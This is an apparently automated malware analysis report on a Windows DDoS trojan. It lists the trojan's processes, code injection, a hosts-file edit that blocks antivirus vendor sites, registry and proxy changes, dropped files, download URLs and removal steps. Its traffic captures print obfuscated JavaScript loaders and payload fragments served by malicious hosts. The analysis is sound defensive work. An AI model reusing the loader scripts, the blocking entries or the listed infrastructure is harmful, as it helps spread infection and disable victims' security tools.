Trojan.Win32.MicroFake.ba (Kaspersky), Trojan.Microfake.D (B) (Emsisoft), Trojan.Microfake.D (AdAware), DDoS.Win32.Nitol.FD, mzpefinder_pcap_file.YR, DDoSNitol.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2536732094c2c9599eda58d7feb40ffa
SHA1: 6bbd5e533f155313736b6b5532933fa01ffce621
SHA256: dc61adbc3391193e93e2f215a8940f68def389b4da6c40db4ba4029e6b1a6f1c
SSDeep: 768:JojY9PKLeWmM1gJb9MCq5L4UZoayHJojY9P:8miLeW3iV9M7ToayH8m
Size: 45056 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-06-08 12:59:36
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
taskkill.exe:2984
kmokq.exe:1948
auiay.exe:2924
regsvr32.exe:1680
hrl1.tmp:1736
The Trojan injects its code into the following process(es):
QQExtrenal.exe:3124
svchost.exe:592
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process QQExtrenal.exe:3124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\etc\hosts (898 bytes)
The process kmokq.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÃÂÂÇÃÂÂõºÃ»÷[1].htm (827 bytes)
%WinDir%\Temp\rhdkm.htm (826 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ãâ€Â´«Ææ[1].htm (4591 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[1].htm (984 bytes)
%WinDir%\Temp\rbrkm.htm (2361 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[2].rar (1338 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÃÂÂõÕßÃÂÂøÂç[1].htm (1678 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[2].htm (803 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[1].rar (14456 bytes)
%WinDir%\Temp\rkrkm.htm (11918 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÃÂÂÇ[1].rar (782 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÃÂÂÇ[1].rar (1338 bytes)
%WinDir%\Temp\rqckm.htm (768 bytes)
%WinDir%\Temp\rbbkm.htm (753 bytes)
%WinDir%\Temp\rqrkm.htm (984 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ãâ€Â´«Ææ[1].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÃÂÂõÕßÃÂÂøÂç[1].htm (0 bytes)
%WinDir%\Temp\rbrkm.htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[2].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÃÂÂÇ[1].rar (0 bytes)
%WinDir%\Temp\rqckm.htm (0 bytes)
%WinDir%\Temp\rbbkm.htm (0 bytes)
The process auiay.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jarinet\QQExtrenal.exe (28 bytes)
The process regsvr32.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)
The process hrl1.tmp:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\eeeaea.exe (37 bytes)
Registry activity
The process taskkill.exe:2984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 08 D2 FB 94 FD AB 8F 98 AC 29 24 EC 26 BE 0D"
The process QQExtrenal.exe:3124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D0 14 E4 90 FF 3C 3D 7B 92 F8 24 71 E9 26 09"
The process kmokq.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 2F F6 14 EA 05 78 02 2B 52 48 36 B7 61 EF 55"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process auiay.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F9 8D B5 8A FE 0B 5E 5C 26 7F 38 09 54 84 34"
The process regsvr32.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 FF F2 9B 4E D6 40 84 48 CC 58 18 B0 C7 B1 92"
The process hrl1.tmp:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 D4 FF E2 C1 93 0F 10 63 F9 10 91 E3 8E AD 6E"
[HKLM\System\CurrentControlSet\Services\Nationalxwn]
"Description" = "Provideskdx a domain server for NI security."
Dropped PE files
MD5 | File path |
---|---|
9df9a9eba8026ee00bde7291adf9e9f7 | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\139869[1].exe |
9df9a9eba8026ee00bde7291adf9e9f7 | c:\WINDOWS\Temp\kmokq.exe |
0e95eca14e441eacc29fecce47be107e | c:\WINDOWS\system32\eeeaea.exe |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to translate host names to IP addresses. The modified file is 898 bytes in size. The following entries are added to the hosts file:
127.0.0.1 www.ijinshan.com
127.0.0.1 www.360.cn
127.0.0.1 www.rising.com.cn
127.0.0.1 www.ijinshan.com
127.0.0.1 kaba365.com
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:2984
kmokq.exe:1948
auiay.exe:2924
regsvr32.exe:1680
hrl1.tmp:1736
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\drivers\etc\hosts (898 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÃÂÂÇÃÂÂõºÃ»÷[1].htm (827 bytes)
%WinDir%\Temp\rhdkm.htm (826 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ãâ€Â´«Ææ[1].htm (4591 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[1].htm (984 bytes)
%WinDir%\Temp\rbrkm.htm (2361 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[2].rar (1338 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÃÂÂõÕßÃÂÂøÂç[1].htm (1678 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÃÂÂõÕßÃÂÂøÂç[2].htm (803 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÃ»÷[1].rar (14456 bytes)
%WinDir%\Temp\rkrkm.htm (11918 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÃÂÂÇ[1].rar (782 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÃÂÂÇ[1].rar (1338 bytes)
%WinDir%\Temp\rqckm.htm (768 bytes)
%WinDir%\Temp\rbbkm.htm (753 bytes)
%WinDir%\Temp\rqrkm.htm (984 bytes)
%System%\jarinet\QQExtrenal.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)
%System%\eeeaea.exe (37 bytes)
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2860 | 3072 | 3.84485 | c9b6b9fbded3d4764666702b145428d1 |
.rdata | 8192 | 2505 | 2560 | 3.36056 | 6951ee1a0ff3a7f5a44727b4713506a3 |
.data | 12288 | 672 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 16384 | 37524 | 37888 | 4.14739 | e57c1612c8a595a9ef275334498299d5 |
.reloc | 57344 | 494 | 512 | 3.52939 | cfa8d04dd000bb30ab126902176ed40d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
405e5da7e3d520ec6da9568f2703d7e5
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.yao933.com/271342303367272317273367.rar?rkrkm | 115.238.241.109 |
hxxp://www.zz12320.com/273312325337243270243260320307315365272317273367.rar?rbrkm | 60.190.218.179 |
hxxp://www.86jfw.com/262306311361242341320307.rar?rbrkm | 113.17.169.8 |
hxxp://180.ghyyy.com/322253273324264253306346.rar?rbrkm | 124.232.152.41 |
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rqrkm | |
hxxp://180.ghyyy.com/322253273324264253306346.rar?rbbkm | 124.232.152.41 |
hxxp://180.ghyyy.com/322253273324264253306346.rar?rqckm | 124.232.152.41 |
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rhdkm | |
hxxp://180.ghyyy.com/322253273324264253306346.rar?rkckm | 124.232.152.41 |
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rnekm | |
hxxp://www.30wz.com/.........rar?rqrkm | 183.60.200.175 |
hxxp://www.30wz.com/.........rar?rhdkm | 183.60.200.175 |
hxxp://180.ghyyy.com/.........rar?rbrkm | 124.232.152.41 |
hxxp://www.yao933.com/.........rar?rkrkm | 115.238.241.109 |
hxxp://180.ghyyy.com/.........rar?rqckm | 124.232.152.41 |
hxxp://www.86jfw.com/.........rar?rbrkm | 113.17.169.8 |
hxxp://180.ghyyy.com/.........rar?rbbkm | 124.232.152.41 |
hxxp://www.zz12320.com/.................rar?rbrkm | 60.190.218.179 |
dk.23145.com | 124.232.141.61 |
www.sj1516.com | 61.174.41.74 |
623968.6600.org | 124.232.158.38 |
www.mojimojimojimoji.com | 69.46.84.61 |
176.jiu75.com | 61.174.42.79 |
1.iqq21.com | 61.174.40.214 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive
Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ............exe..j"^yh$.f..exe...L-.....X.P......8....y8..n..t.....Gt...d..?%...../.B&........k;...x.. .....>......x.....~?.4v.4..#$~....B. 3..k{c#z.P...[[c.....{.X.7........."..../.$]..y.6.....o..L.....Z..[E.2....:.s.V.$...D..1...../c._.;j[.2..mK........z#..........e'..m.....?..{3./.W...SP..'...~.....s........h...f...\..A..G........?.V.....a....c.........O....A/....P...5....._......V.........#.W..&. ........n...7...........J....t.......0..............'T2..O`...Eo..].U.......5%o.L...>*.h...N.^..C.b.\T`.x ..........[XW`......B....8n...<a.x.....,..Az.."CW..^MD...-.F.....q... ....;.Z...@.....;.. ....U...O.}o...2.@.(...M2..k.. o.n.{.^..f7..9......T.BqO....s..@..&.ou.............cOy&.....W,.j4.......g..'..<...........B8.)..$IH}Iw:.w...@...l.....q.GE]a...c....-fT_p"b#6...._>>.tl_.d.....'.sy.#...;.....5..<....0.....`........8T....e6.e.52.....LG....5..Z...y"RU..|...{6........g..H.l~.C{.....o.........@...3.^m.7.St..j*..:...3.........W"o-..c...N...s.R....{C..... .WrP......!.dbJ.... .K:.w...m........Y.\....u.n..b.=.".....h....p.....7|2.t....n....op...[..s!."....<|.s[...=T.X9q. `....9..-P&...g./. ..H6..h.r.>k...@.THTTP/1.1 200 OK..Content-Length: 9337155..Content-Type: application/octet-stream..Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT..Accept-Ranges: bytes..ETag: "7cee72e7991d01:29b"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Mon, 17 Nov 2014 12:11:12 GMT..Connection: keep-alive..Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ..
<<< skipped >>>
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function bvtjkXR(nJeN){var m;var R;m="";for(var d=0;d<nJeN.length;d ){R=nJeN.charCodeAt(d)^31;m =String.fromCharCode(R^30);}return m;}function nsrqnFX(){var bMlC = document.getElementById("iAyX").value;var hYqC=oqehmWE();window.location=bvtjkXR(hYqC) bMlC;}function dnnybXT(){var w="107,53,104,52,53";return eval("String.fromCharCode(" w ")");}function oqehmWE(){var w="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" w ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var zWvP=dnnybXT();document.write(bvtjkXR(zWvP));</script> </font><input id="iAyX"> <input type=button value="................" onmouseup="nsrqnFX()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function cvlmcUT(){var t="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" t ")");}function sngerDA(xLcU){var u;var M;u="";for(var g=0;g<xLcU.length;g ){M=xLcU.charCodeAt(g)^19;u =String.fromCharCode(M^18);}return u;}function qmgdjJT(){var t="107,53,104,52,53";return eval("String.fromCharCode(" t ")");}function ikxwqYV(){var qLxW = document.getEl
<<< skipped >>>
GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:25 GMT
Connection: keep-alive
Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f.T...exe..T.*..U.......0. .TQP@@D@I..#A%..@Hs.H0p....D..A.......A"HU H.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z..t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h....&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>...........z.F.}.@.....B..-....?.C...MF.....k...[....:.F.f%...z>..q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc.....;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n....t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.50.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u....s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3...........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l..r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......>../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=..b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt...T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..
<<< skipped >>>
GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 98
Pragma: no-cache
Cache-control: no-store
<html><body><script>var gp="/........",hp="djfz2",kp,ip=new Array(),jp;function ep(fp){for(kp=0;kp<jp.length;kp )ip[kp]=jp.charCodeAt(kp);kp="kp=4;for(;kp<=53;){ip[kp]=(((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)>>5))>>5)|((((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)>>5))<<3)&0xff);kp ;}";eval(kp);kp="kp=53;do{if(kp<3)break;ip[kp]=(((((ip[kp] 229)&0xff)-109)&0xff)>>3)|((((((ip[kp] 229)&0xff)-109)&0xff)<<5)&0xff);kp--;}while(true);";eval(kp);kp=1;while(kp<=51){ip[kp]=(((((ip[kp] 169)&0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))>>6)|((((((ip[kp] 169)&0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))<<2)&0xff);kp ;}jp="";for(kp=1;kp<ip.length-1;kp )if(kp%5)jp =String.fromCharCode(ip[kp]^fp);kp=eval;kp(jp);}jp="hO\x92\x19:!\x0en\x01\x1a^\x0e>6zu\x16\x0e\x02E\xc7.j\x1d1/\x01r6r\x04MrvrB\x1e\x06!\x12\xf1:\x22n\x1e\x0e&VE:Y1\xf7_\xc0 ";ep(176);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 984.Pragma: no-cache..Cache-control: no-store..<html><body><script>var gp="/........",hp="djfz2",kp,ip=new Array(),jp;function ep(fp){for(kp=0;kp<jp.length;kp )ip[kp]=jp.charCodeAt(kp);kp="kp=4;for(;kp<=53;){ip[kp]=(((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)&g
<<< skipped >>>
GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:26 GMT
Connection: keep-alive
Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f.T...exe..T.*..U.......0. .TQP@@D@I..#A%..@Hs.H0p....D..A.......A"HU H.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z..t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h....&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>...........z.F.}.@.....B..-....?.C...MF.....k...[....:.F.f%...z>..q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc.....;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n....t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.50.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u....s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3...........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l..r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......>../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=..b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt...T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..
<<< skipped >>>
GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 80
Pragma: no-cache
Cache-control: no-store
<html><body><script>var qy="/........",ry="djfz2",uy,sy=new Array(),ty;function oy(py){for(uy=0;uy<ty.length;uy )sy[uy]=ty.charCodeAt(uy);uy="uy=54;for(;;){if(uy<4)break;sy[uy]=(sy[uy]-sy[uy-1])&0xff;uy--;}";eval(uy);uy="uy=1;while(true){if(uy>56)break;sy[uy]=(sy[uy]-sy[uy 1])&0xff;uy ;}";eval(uy);uy=1;while(true){if(uy>56)break;sy[uy]=(sy[uy] sy[uy 1])&0xff;uy ;}ty="";for(uy=1;uy<sy.length-1;uy )if(uy%7)ty =String.fromCharCode(sy[uy]^py);uy=eval;uy(ty);}ty="\xa5a\r\xfe\x8e\x122;\xf8\xbeA\x8c\xab\x85*\xc8\xc7\x00\x92\x8c\xe8\xa8\x9e$\xa5\xc5\x1b\xd5\xc6\x1a5\n\xacOs\xa6X\xc9\x18\n\xe8m\x227\x9d|\xa3\x1c\xd6\x17\x9b\xed&\x11\xd9sV=\xfe";oy(20);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>..
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 766
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function crhnuUL(){var s="40,56,116,116,97,112,108,98,126,58,126,62,109,62,51";return eval("String.fromCharCode(" s ")");}function hfcnwPH(xXcG){var q;var D;q="";for(var m=0;m<xXcG.length;m ){D=xXcG.charCodeAt(m)^60;q =String.fromCharCode(D^59);}return q;}function ajwpbCS(){var s="109,51,110,50,51";return eval("String.fromCharCode(" s ")");}function ddkipIH(){var yCvO = document.getElementById("nTqP").value;var xBnV=crhnuUL();window.location=hfcnwPH(xBnV) yCvO;}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var uMqM=ajwpbCS();document.write(hfcnwPH(uMqM));</script> </font><input id="nTqP"> <input type=button value="................" onmouseup="ddkipIH()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function vvhxnCX(jNjP){var m;var T;m="";for(var v=0;v<jNjP.length;v 